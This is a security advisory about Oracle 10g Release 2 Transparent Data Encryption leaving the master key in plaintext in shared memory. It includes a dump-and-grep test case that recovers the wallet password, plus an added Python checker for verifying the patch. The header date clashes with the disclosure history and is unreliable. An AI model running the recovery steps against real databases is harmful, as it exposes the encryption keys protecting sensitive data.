Transparent Data Encryption stores key unencrypted in the SGA

Name Transparent Data Encryption stores key unencrypted in the SGA
Systems Affected Oracle Database 10g Release 2
Severity High Risk
Category Information disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 17 January 2005 (V 1.00)
Oracle Bugno 5802173
Time to fix 190 days


Details
The Oracle security feature "Transparent Data Encryption" stores the master key unencrypted
in the SGA. A skilled attacker or a non-security DBA can retrieve the plaintext master key.

Test case
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";

System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 
Production With the Partitioning, OLAP and Data Mining options


[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin

[oracle@ora10201 /]$ cd /tmp

[oracle@ora10201 /]$ dumpsga 

[oracle@ora10201 /]$ strings * | grep -iH secretpassword 
secretpassword secretpassword secretpassword [] Excerpt from the SGA /oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@d$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0d$dd$-
^@^@0d$L4^L^Xp /]/<8f>^Dsecretpassword^@^M^U^B^@d$4^Lfile:/oracle/10.2.0/admin/ora10201/wallet []
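The test case above greps the SGA dump for the wallet password that was supplied in the ALTER SYSTEM statement. The following script is an added example, not part of the advisory, that automates the same check so a DBA can repeat it after applying the patch and confirm the password no longer appears in the dump. It scans every file in a dump directory for the secret both as single-byte text (what strings and grep see) and as UTF-16LE, which strings misses by default. The directory layout, the function names and the SAMPLE_DUMP bytes are constructed for this example; the sample only imitates the look of the excerpt above.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Constructed sample bytes that imitate what an SGA dump looks like: the
# wallet password between binary junk, plus a second copy in UTF-16LE.
# This is invented test data, not output from a real dumpsga run.
SAMPLE_DUMP = (
    b"\x00\x00Excerpt from the SGA /oracle/10.2.0/admin/ora01/wallet/\x00"
    b"\x8f\x04secretpassword\x00\x0d\x15\x02\x00d$4\x0c"
    b"file:/oracle/10.2.0/admin/ora10201/wallet\x00"
    + "SecretPassword".encode("utf-16-le")
    + b"\x00\x00unrelated data\x00"
)


def find_plaintext_secret(data: bytes, secret: str) -> List[Tuple[int, str]]:
    """Return (offset, encoding) for every case-insensitive occurrence of
    `secret` in `data`. Both single-byte text and UTF-16LE are checked;
    an empty list means the secret was not found in plaintext."""
    hits = []
    for enc in ("latin-1", "utf-16-le"):
        needle = re.escape(secret.encode(enc))
        # IGNORECASE on a bytes pattern folds ASCII letters only, which is
        # exactly what `grep -i` does on the raw strings output.
        for m in re.finditer(needle, data, flags=re.IGNORECASE):
            hits.append((m.start(), enc))
    return sorted(hits)


def scan_dump_dir(dump_dir: str, secret: str) -> Dict[str, List[Tuple[int, str]]]:
    """Scan every regular file in `dump_dir` (the directory dumpsga wrote
    into) and map each file name to the hits found in it. Files without
    a hit are omitted, so an empty dict means the dump is clean."""
    findings = {}
    for name in sorted(os.listdir(dump_dir)):
        path = os.path.join(dump_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            hits = find_plaintext_secret(fh.read(), secret)
        if hits:
            findings[name] = hits
    return findings


def demo() -> Dict[str, List[Tuple[int, str]]]:
    """Write the constructed sample into a temporary dump directory next to
    a clean file and scan it; returns the findings for inspection."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "sga_region_1.dmp"), "wb") as fh:
            fh.write(SAMPLE_DUMP)
        with open(os.path.join(tmp, "sga_region_2.dmp"), "wb") as fh:
            fh.write(b"\x00nothing sensitive here\x00")
        return scan_dump_dir(tmp, "secretpassword")


if __name__ == "__main__":
    for fname, hits in demo().items():
        for offset, enc in hits:
            print(f"{fname}: wallet password found at offset {offset} ({enc})")
```

On a real system, run dumpsga as in the test case, then call scan_dump_dir with the dump directory and the wallet password; an empty result after patching is the expected outcome, and any hit means the password is still resident in shared memory.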

Patch Information
Oracle fixed this issue with the patches in the Critical Patch Update January 2006 (CPU January 2006) for Oracle 10g Release 2.

History
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory



2006 by Red-Database-Security GmbH - last update 17-jan-2006

Oracle Transparent Data Encryption (TDE)

Oracle Transparent Data Encryption enables you to encrypt data in columns without having to manage the encryption key. Businesses can protect sensitive data in their databases without having to change their applications.

Oracle Transparent Data Encryption is a new feature of Oracle 10g Release 2 and part of the Oracle Advanced Security Option (ASO).